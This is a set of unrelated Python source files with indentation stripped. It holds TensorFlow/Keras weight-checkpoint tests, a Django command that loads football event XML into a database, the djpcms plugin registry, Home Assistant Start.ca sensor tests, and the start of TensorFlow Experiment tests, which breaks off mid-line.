def test_no_graph_pollution(self):
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.session(graph) as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
model(x) # pylint: disable=not-callable
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
op_count = len(graph.get_operations())
model.save_weights(prefix, save_format='tensorflow')
self.assertEqual(len(graph.get_operations()), op_count)
model.load_weights(prefix)
op_count = len(graph.get_operations())
model.load_weights(prefix)
self.assertEqual(len(graph.get_operations()), op_count)
def _weight_loading_test_template(self, make_model_fn):
with self.cached_session():
model = make_model_fn()
model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
train_x = np.random.random((3, 2))
train_y = np.random.random((3,))
x = constant_op.constant(train_x, dtype=dtypes.float32)
model.train_on_batch(train_x, train_y)
model.save_weights(prefix, save_format='tf')
ref_y_before_train = model.predict(train_x)
model.train_on_batch(train_x, train_y)
ref_y_after_train = model.predict(train_x)
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
model.load_weights(prefix)
self.assertAllClose(ref_y_before_train, self.evaluate(model(x)))
# Test restore-on-create if this is a subclassed Model (graph Networks
# will have already created their variables).
load_model = make_model_fn()
load_model.load_weights(prefix)
self.assertAllClose(
ref_y_before_train,
self.evaluate(load_model(x)))
load_model = make_model_fn()
load_model.load_weights(prefix)
# We need to run some of the restore ops for predict(), but not all
# variables have been created yet (optimizer slot variables). Tests
# incremental restore.
load_model.predict(train_x)
load_model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
load_model.train_on_batch(train_x, train_y)
self.assertAllClose(ref_y_after_train, self.evaluate(load_model(x)))
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model(self):
def _make_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
return keras.models.Model(a, b)
self._weight_loading_test_template(_make_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model(self):
self._weight_loading_test_template(SubclassedModel)
def _new_layer_weight_loading_test_template(
self, first_model_fn, second_model_fn, restore_init_fn):
with self.cached_session() as session:
model = first_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix)
self.assertEqual(
prefix,
checkpoint_management.latest_checkpoint(temp_dir))
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
second_model = second_model_fn()
second_model.load_weights(prefix)
second_model(x)
self.evaluate(restore_init_fn(second_model))
second_model.save_weights(prefix)
# Check that the second model's checkpoint loads into the original model
model.load_weights(prefix)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dense(1, name='second')(x)
b = keras.layers.Dense(3, name='secondjr')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.layers[-1].variables]
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_no_weight_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dropout(rate=0.1)(x)
b = keras.layers.Dense(1, name='second')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
del restore_model # unused
return []
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model_added_layer(self):
class SubclassedModelRestore(training.Model):
def __init__(self):
super(SubclassedModelRestore, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.y_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.y_layer(self.x_layer(a)))
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.y_layer.variables]
self._new_layer_weight_loading_test_template(
SubclassedModel, SubclassedModelRestore,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_incompatible_checkpoint(self):
save_path = trackable.Checkpoint().save(
os.path.join(self.get_temp_dir(), 'ckpt'))
m = keras.Model()
with self.assertRaisesRegexp(AssertionError, 'Nothing to load'):
m.load_weights(save_path)
m.dense = keras.layers.Dense(2)
m.dense(constant_op.constant([[1.]]))
with self.assertRaisesRegexp(
AssertionError, 'Nothing except the root object matched'):
m.load_weights(save_path)
@test_util.run_in_graph_and_eager_modes
def test_directory_passed(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'ckpt/')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_relative_path(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
os.chdir(self.get_temp_dir())
prefix = 'ackpt'
self.evaluate(v.assign(42.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt.index'))
self.evaluate(v.assign(1.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
prefix = 'subdir/ackpt'
self.evaluate(v.assign(43.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('subdir/ackpt.index'))
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(43., self.evaluate(v))
prefix = 'ackpt/'
self.evaluate(v.assign(44.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt/.index'))
self.evaluate(v.assign(3.))
m.load_weights(prefix)
self.assertEqual(44., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_nonexistant_prefix_directory(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'bckpt')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
if __name__ == '__main__':
test.main()
| |
### Read from F24 files and construct EventStatistic models
import utils.xmls as xml_utils
import datetime
import os
import time
from teams.models import Team
from games.models import Game
from players.models import Player
from eventstatistics.models import EventStatistic
from qualifiers.models import Qualifier
from django.core.management.base import BaseCommand
def is_tag(xml_obj, tag):
"""Return true if the XML object is the Tag"""
return xml_obj.tag == tag
def is_tag_and_type(xml_obj, tag, type):
"""Return true if the XML object is of the right Tag and Type"""
return xml_obj.tag == tag and xml_utils.get_attrib_if_exists(xml_obj,"Type") == type
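# Illustrative example (hypothetical element): for <Q id="1" Type="Shot"/>,
# is_tag(q, "Q") is True, is_tag_and_type(q, "Q", "Shot") is True and
# is_tag_and_type(q, "Q", "Goal") is False.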
class Command(BaseCommand):
"""
Sample usage:
python manage.py build_eventstatistic_table_ALL_FILES \
--dry_run \
--partial_load \
--data_filepath=data/f24
"""
help = "Populate game table"
def add_arguments(self, parser):
"""Add custom CLI arguments"""
parser.add_argument(
"--dry_run",
action="store_true",
dest="dry_run",
default=False,
help="Don't save and just print teams",
)
parser.add_argument(
"--partial_load",
action="store_true",
dest="partial_load",
default=False,
help="Loading partial F24 files?",
)
parser.add_argument(
"--data_filepath",
dest="data_filepath",
type=str,
required=True,
help="Filepath containing all data files to load",
)
def handle(self, *args, **options):
print "AJS Run at " + str(datetime.datetime.now())
script_start = time.time()
data_filepath = options["data_filepath"]
is_dry_run = options["dry_run"]
is_partial_load = options["partial_load"]
print "Importing EventStatistics and Qualifiers from %s" % (data_filepath)
if is_dry_run:
print "This is a dry run and will not save any data"
if is_partial_load:
print "This is knowingly a partial load of some files; which means many more hits to the DB"
event_pull_count = 0
event_saved_count = 0
q_pull_count = 0
q_saved_count = 0
file_count = 0
for root_dir, sub_dirs, filenames in os.walk(data_filepath):
for f in filenames:
temp = time.time()
file_start = time.time()
file_count += 1
file_event_saved_count = 0
file_q_saved_count = 0
                xml_file = os.path.join(root_dir, f)  # join with the walked dir so nested files resolve
#Open up F24 and find root: <Games>
xml_data_root = xml_utils.get_root_from_file(xml_file)
#Find <Game>
xml_Game = xml_utils.get_tag(xml_data_root, "Game")
game_uuid = xml_utils.get_attrib_if_exists(xml_Game, "id")
db_Game = Game.objects.get(uuid="f"+game_uuid)
game_datetime = xml_utils.get_attrib_if_exists(xml_Game, "game_date")
game_datetime = datetime.datetime.strptime(game_datetime,'%Y-%m-%dT%H:%M:%S')
temp = time.time()
if is_partial_load:
                    # NOTE: filter on game only; the per-event team (db_Team) is
                    # not known until the <Event> loop below.
                    existing_event_stats = EventStatistic.objects.filter(game=db_Game)
existing_stats = [str(i.uuid) for i in existing_event_stats]
temp = time.time()
#Iterate through <Game> and only pay attention to <Event>s
for xml_Event in xml_utils.get_children(xml_Game):
                    if not is_tag(xml_Event, "Event"):
                        continue #skip if not the relevant <Event> child
event_uuid = xml_utils.get_attrib_if_exists(xml_Event, "id")
event_id = xml_utils.get_attrib_if_exists(xml_Event, "event_id")
player_id = xml_utils.get_attrib_if_exists(xml_Event, "player_id")
if player_id:
db_Player = Player.objects.get(uuid="p"+player_id)
else:
db_Player = None
team_id = xml_utils.get_attrib_if_exists(xml_Event, "team_id")
db_Team = Team.objects.get(uuid="t"+team_id)
type_id = xml_utils.get_attrib_if_exists(xml_Event, "type_id")
period_id = xml_utils.get_attrib_if_exists(xml_Event, "period_id")
minute = xml_utils.get_attrib_if_exists(xml_Event, "min")
second = xml_utils.get_attrib_if_exists(xml_Event, "sec")
outcome = xml_utils.get_attrib_if_exists(xml_Event, "outcome")
x_coord = xml_utils.get_attrib_if_exists(xml_Event, "x")
y_coord = xml_utils.get_attrib_if_exists(xml_Event, "y")
timestamp = xml_utils.get_attrib_if_exists(xml_Event, "timestamp")
timestamp = datetime.datetime.strptime(timestamp,'%Y-%m-%dT%H:%M:%S.%f')
time_delta = timestamp - game_datetime
relative_seconds = time_delta.total_seconds()
                    # Coerce optional XML attributes to booleans (attribute present -> True).
                    assist = bool(xml_utils.get_attrib_if_exists(xml_Event, "assist"))
                    keypass = bool(xml_utils.get_attrib_if_exists(xml_Event, "keypass"))
temp = time.time()
new_event_statistic = EventStatistic(
uuid=event_uuid
,event_id=event_id
,game=db_Game
,player=db_Player
,team=db_Team
,type_id=type_id
,period_id=period_id
,minute=minute
,second=second
,outcome=outcome
,assist=assist
,keypass=keypass
,x=x_coord
,y=y_coord
,relative_seconds=relative_seconds
)
temp = time.time()
event_pull_count += 1
                    if not is_dry_run:
if is_partial_load and new_event_statistic.uuid not in existing_stats:
new_event_statistic.save()
event_saved_count += 1
file_event_saved_count += 1
else:
new_event_statistic.save()
event_saved_count += 1
file_event_saved_count += 1
if is_partial_load:
existing_Q_stats = Qualifier.objects.filter(event_statistic=new_event_statistic)
existing_Qs = [str(i.uuid) for i in existing_Q_stats]
temp = time.time()
for xml_Qualifier in xml_utils.get_children(xml_Event):
                        if not is_tag(xml_Qualifier, "Q"):
                            continue #skip if not the relevant <Q> child
q_uuid = xml_utils.get_attrib_if_exists(xml_Qualifier, "id")
qualifier_id = xml_utils.get_attrib_if_exists(xml_Qualifier, "qualifier_id")
value = xml_utils.get_attrib_if_exists(xml_Qualifier, "value")
temp = time.time()
new_qualifier = Qualifier(
event_statistic=new_event_statistic
,uuid=q_uuid
,qualifier_id=qualifier_id
,value=value
)
q_pull_count += 1
                        if not is_dry_run:
                            if is_partial_load and new_qualifier.uuid not in existing_Qs:
new_qualifier.save()
q_saved_count += 1
file_q_saved_count += 1
else:
new_qualifier.save()
q_saved_count += 1
file_q_saved_count += 1
temp = time.time()
file_end = time.time()
print "# files parsed = %s; saved EventStats = %s; saved Qs = %s; file time = %s secs; closing %s..." \
% (str(file_count), file_event_saved_count, file_q_saved_count, (file_end - file_start), f)
print "\n# event-statistics pulled from files = %s" % (str(event_pull_count))
print "# event-statistics actually saved to DB = %s" % (str(event_saved_count))
print "\n# qualifiers pulled from files = %s" % (str(q_pull_count))
print "# qualifiers actually saved to DB = %s" % (str(q_saved_count))
script_end = time.time()
print "\n%s minutes to complete script" % ((script_end - script_start) / 60)
| |
import os
import logging
import json
from djpcms import forms
from djpcms.forms import form_kwargs
from djpcms.utils import force_str
from djpcms.utils.text import capfirst, nicename
from djpcms.utils.formjson import form2json
_plugin_dictionary = {}
_wrapper_dictionary = {}
def ordered_generator(di):
cmp = lambda x,y : 1 if x.description > y.description else -1
def _():
return ((c.name,c.description) for c in sorted(di.values(),cmp))
return _
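# Illustrative behaviour: the generators built below yield (name, description)
# pairs for every registered plugin/wrapper, sorted alphabetically by
# description; presumably useful as form choices, though that is an assumption.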
plugingenerator = ordered_generator(_plugin_dictionary)
wrappergenerator = ordered_generator(_wrapper_dictionary)
get_plugin = lambda name, default = None: _plugin_dictionary.get(name,default)
get_wrapper = lambda name, default = None: _wrapper_dictionary.get(name,default)
def register_application(app, name = None, description = None):
'''Register an application view as a plugin
* *app* is an instance of an :class:`djpcms.views.appview.AppViewBase`
* *name* name for this plugin'''
global _plugin_dictionary
if hasattr(app,'get_plugin'):
p = app.get_plugin()
else:
p = ApplicationPlugin(app)
#media = p.media + app.get_media()
#p.__class__.media = media
#p.register()
class DJPpluginMetaBase(forms.MediaDefiningClass):
'''
    Just a metaclass to differentiate plugins from other classes
'''
def __new__(cls, name, bases, attrs):
new_class = super(DJPpluginMetaBase, cls).__new__
if attrs.pop('virtual',None) or not attrs.pop('auto_register',True):
return new_class(cls, name, bases, attrs)
pname = attrs.get('name',None)
if pname is None:
pname = name
pname = pname.lower()
descr = attrs.get('description',None)
if not descr:
descr = pname
if pname != '':
descr = nicename(descr)
attrs['name'] = pname
attrs['description'] = descr
pcls = new_class(cls, name, bases, attrs)
pcls()._register()
return pcls
class DJPpluginMeta(DJPpluginMetaBase):
'''
Just a metaclass to differentiate plugins from other classes
'''
class DJPwrapperMeta(DJPpluginMetaBase):
'''
Just a metaclass to differentiate wrapper from other classes
'''
class DJPwrapper(object):
'''Class responsible for wrapping :ref:`djpcms plugins <plugins-index>`.
'''
__metaclass__ = DJPwrapperMeta
virtual = True
name = None
'''Unique name. If not provided the class name will be used. Default ``None``.'''
form_layout = None
def wrap(self, djp, cblock, html):
'''Wrap content for block and return safe HTML.
This function should be implemented by derived classes.
* *djp* instance of :class:`djpcms.views.response.DjpResponse`.
        * *cblock* instance of :class:`djpcms.models.BlockContent`.
* *html* safe unicode string of inner HTML.'''
return html if html else ''
def __call__(self, djp, cblock, html):
name = cblock.plugin_name
id = cblock.htmlid()
head = '<div id="{0}" class="djpcms-block-element plugin-{1}">\n'.format(id,name)
inner = self.wrap(djp, cblock, html)
return head + inner + '\n</div>'
def _register(self):
global _wrapper_dictionary
_wrapper_dictionary[self.name] = self
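# Illustrative sketch (not part of the original module): a minimal wrapper.
# Subclassing DJPwrapper and overriding ``wrap`` is all that is needed; the
# metaclass registers the wrapper under its ``name`` at class creation time.
# The ``box`` name and extra div are assumptions for the example.
#
#   class BoxWrapper(DJPwrapper):
#       name = 'box'
#       def wrap(self, djp, cblock, html):
#           return '<div class="box">%s</div>' % html if html else ''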
class DJPplugin(object):
'''Base class for Plugins. These classes are used to display contents on a ``djpcms`` powered site.
The basics:
* A Plugin is dynamic application.
* It is rendered within a :class:`DJPwrapper` and each :class:`DJPwrapper` displays a plugin.
* It can define style and javascript to include in the page, in a static way (as a ``meta`` property of the class) or in a dynamic way by member functions.
* It can have parameters to control its behaviour.'''
__metaclass__ = DJPpluginMeta
virtual = True
'''If set to true, the class won't be registered with the plugin's dictionary. Default ``False``.'''
name = None
'''Unique name. If not provided the class name will be used. Default ``None``.'''
description = None
'''A short description to display in forms.'''
form = None
'''Form class for editing the plugin parameters. Default ``None``, the plugin has no arguments.'''
form_withrequest = False
'''Equivalent to :attr:`djpcms.views.appsite.ModelApplication.form_withrequest`. If set to ``True``,
the ``request`` instance is passed to the :attr:`form` constructor. Default is ``False``.'''
permission = 'authenticated'
#storage = _plugin_dictionary
#URL = None
def js(self, **kwargs):
'''Function which can be used to inject javascript dynamically.'''
return None
def css(self):
'''Function which can be used to inject css dynamically.'''
return None
def arguments(self, args):
try:
kwargs = json.loads(args)
if isinstance(kwargs,dict):
rargs = {}
for k,v in kwargs.items():
rargs[str(k)] = v
return self.processargs(rargs)
else:
return {}
except:
return {}
def processargs(self, kwargs):
'''You can use this hook to perform pre-processing on plugin parameters if :attr:`form` is set.
By default do nothing.
'''
return kwargs
def __call__(self, djp, args = None, wrapper = None, prefix = None):
return self.render(djp, wrapper, prefix, **self.arguments(args))
def edit(self, djp, args = None, **kwargs):
kwargs.update(**self.arguments(args))
return self.edit_form(djp, **kwargs)
def edit_form(self, djp, **kwargs):
        '''Returns the form used to edit the plugin **content**. Most plugins don't need to implement this
        function but some do. Check
        the :class:`djpcms.plugins.text.Text` for example. By default it returns ``None``.'''
return None
def render(self, djp, wrapper, prefix, **kwargs):
'''Render the plugin. It returns a safe string to be included in the HTML page.
This is the function plugins need to implement.
* *djp* instance of :class:`djpcms.views.response.DjpResponse`.
* *wrapper* :class:`DJPwrapper` instance which wraps the plugin.
* *prefix* a prefix string or ``None`` to use for forms within the plugin.
* *kwargs* plugin specific key-valued arguments.'''
return ''
def save(self, pform):
'''Save the form plugin'''
return form2json(pform)
def get_form(self, djp, args = None, withdata = True):
'''Return an instance of a :attr:`form` or `None`. Used to edit the plugin when in editing mode.
        Usually, there is no need to override this function. If your plugin needs input parameters when editing, simply set the
:attr:`form` attribute.
'''
if self.form:
initial = self.arguments(args) or None
return self.form(**form_kwargs(request = djp.request,
initial = initial,
withrequest = self.form_withrequest,
withdata = withdata,
own_view = djp.own_view()))
#def response(self, request, *bits):
# raise http.Http404
def _register(self):
global _plugin_dictionary
_plugin_dictionary[self.name] = self
def __eq__(self, other):
if isinstance(other,DJPplugin):
return self.name == other.name
return False
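# Illustrative sketch (not part of the original module): a minimal plugin with
# one parameter. ``form`` provides the editing form, and the decoded JSON
# arguments are passed to ``render`` as keyword arguments. The names below
# (GreetingForm, greeting) are assumptions for the example.
#
#   class GreetingForm(forms.Form):
#       greeting = forms.CharField(initial='hello')
#
#   class GreetingPlugin(DJPplugin):
#       name = 'greeting'
#       description = 'Greeting plugin'
#       form = GreetingForm
#       def render(self, djp, wrapper, prefix, greeting='hello', **kwargs):
#           return '<p>%s</p>' % greeting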
class EmptyPlugin(DJPplugin):
'''
    This is the empty plugin. It renders nothing.
'''
name = ''
description = '--------------------'
class ThisPlugin(DJPplugin):
    '''Current view plugin. This plugin renders the current view
only if it is an instance of :class:`djpcms.views.appview.AppViewBase`.
For example if the current view is a :class:`djpcms.views.appview.SearchView`,
the plugin will display the search view for that application.
'''
name = 'this'
description = 'Current View'
def render(self, djp, wrapper, prefix, **kwargs):
djp.wrapper = wrapper
djp.prefix = prefix
return djp.view.render(djp)
class ApplicationPlugin(DJPplugin):
'''Plugin formed by :class:`djpcms.views.appview.AppViewBase` classes
which have the :attr:`djpcms.views.appview.AppViewBase.isplugin` attribute
set to ``True``.
    For example, let's say an application has a :class:`djpcms.views.appview.AddView` view
    which is registered as a plugin; then it will be managed by this plugin.'''
auto_register = False
def __init__(self, app, name = None, description = None):
global _plugin_dictionary
self.app = app
self.form = app.plugin_form
if not name:
name = '%s-%s' % (app.appmodel.name,app.name)
if not description:
description = app.description or name
self.name = name
self.description = nicename(description)
_plugin_dictionary[self.name] = self
def render(self, djp, wrapper, prefix, **kwargs):
#kwargs may be an input from a possible plugin form
app = self.app
request = djp.request
html = u''
if app.has_permission(request):
if djp.view != app or kwargs:
args = djp.kwargs.copy()
args.update(kwargs)
t_djp = self.app(djp.request, **args)
else:
t_djp = djp
t_djp.wrapper = wrapper
t_djp.prefix = prefix
html = self.app.render(t_djp)
# Add media. It must be after having called render!!
if djp != t_djp:
djp.media += t_djp.media
return html
class SimpleWrap(DJPwrapper):
name = 'simple no-tags'
default_content_wrapper = SimpleWrap()
| |
"""Tests for the Start.ca sensor platform."""
import asyncio
from homeassistant.bootstrap import async_setup_component
from homeassistant.components.sensor.startca import StartcaData
from homeassistant.helpers.aiohttp_client import async_get_clientsession
@asyncio.coroutine
def test_capped_setup(hass, aioclient_mock):
"""Test the default setup."""
config = {'platform': 'startca',
'api_key': 'NOTAKEY',
'total_bandwidth': 400,
'monitored_variables': [
'usage',
'usage_gb',
'limit',
'used_download',
'used_upload',
'used_total',
'grace_download',
'grace_upload',
'grace_total',
'total_download',
'total_upload',
'used_remaining']}
result = '<?xml version="1.0" encoding="ISO-8859-15"?>'\
'<usage>'\
'<version>1.1</version>'\
'<total> <!-- total actual usage -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</total>'\
'<used> <!-- part of usage that counts against quota -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</used>'\
'<grace> <!-- part of usage that is free -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</grace>'\
'</usage>'
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
text=result)
yield from async_setup_component(hass, 'sensor', {'sensor': config})
state = hass.states.get('sensor.start_ca_usage_ratio')
assert state.attributes.get('unit_of_measurement') == '%'
assert state.state == '76.24'
state = hass.states.get('sensor.start_ca_usage')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_data_limit')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '400'
state = hass.states.get('sensor.start_ca_used_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_used_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_used_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '311.43'
state = hass.states.get('sensor.start_ca_grace_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_grace_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_grace_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '311.43'
state = hass.states.get('sensor.start_ca_total_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_total_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_remaining')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '95.05'
@asyncio.coroutine
def test_unlimited_setup(hass, aioclient_mock):
"""Test the default setup."""
config = {'platform': 'startca',
'api_key': 'NOTAKEY',
'total_bandwidth': 0,
'monitored_variables': [
'usage',
'usage_gb',
'limit',
'used_download',
'used_upload',
'used_total',
'grace_download',
'grace_upload',
'grace_total',
'total_download',
'total_upload',
'used_remaining']}
result = '<?xml version="1.0" encoding="ISO-8859-15"?>'\
'<usage>'\
'<version>1.1</version>'\
'<total> <!-- total actual usage -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</total>'\
'<used> <!-- part of usage that counts against quota -->'\
'<download>0</download>'\
'<upload>0</upload>'\
'</used>'\
'<grace> <!-- part of usage that is free -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</grace>'\
'</usage>'
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
text=result)
yield from async_setup_component(hass, 'sensor', {'sensor': config})
state = hass.states.get('sensor.start_ca_usage_ratio')
assert state.attributes.get('unit_of_measurement') == '%'
assert state.state == '0'
state = hass.states.get('sensor.start_ca_usage')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_data_limit')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == 'inf'
state = hass.states.get('sensor.start_ca_used_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_used_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_used_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_grace_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_grace_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_grace_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '311.43'
state = hass.states.get('sensor.start_ca_total_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_total_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_remaining')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == 'inf'
@asyncio.coroutine
def test_bad_return_code(hass, aioclient_mock):
"""Test handling a return code that isn't HTTP OK."""
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
status=404)
scd = StartcaData(hass.loop, async_get_clientsession(hass),
'NOTAKEY', 400)
result = yield from scd.async_update()
assert result is False
@asyncio.coroutine
def test_bad_json_decode(hass, aioclient_mock):
"""Test decoding invalid json result."""
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
text='this is not xml')
scd = StartcaData(hass.loop, async_get_clientsession(hass),
'NOTAKEY', 400)
result = yield from scd.async_update()
assert result is False
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
import tempfile
import threading
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, export_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
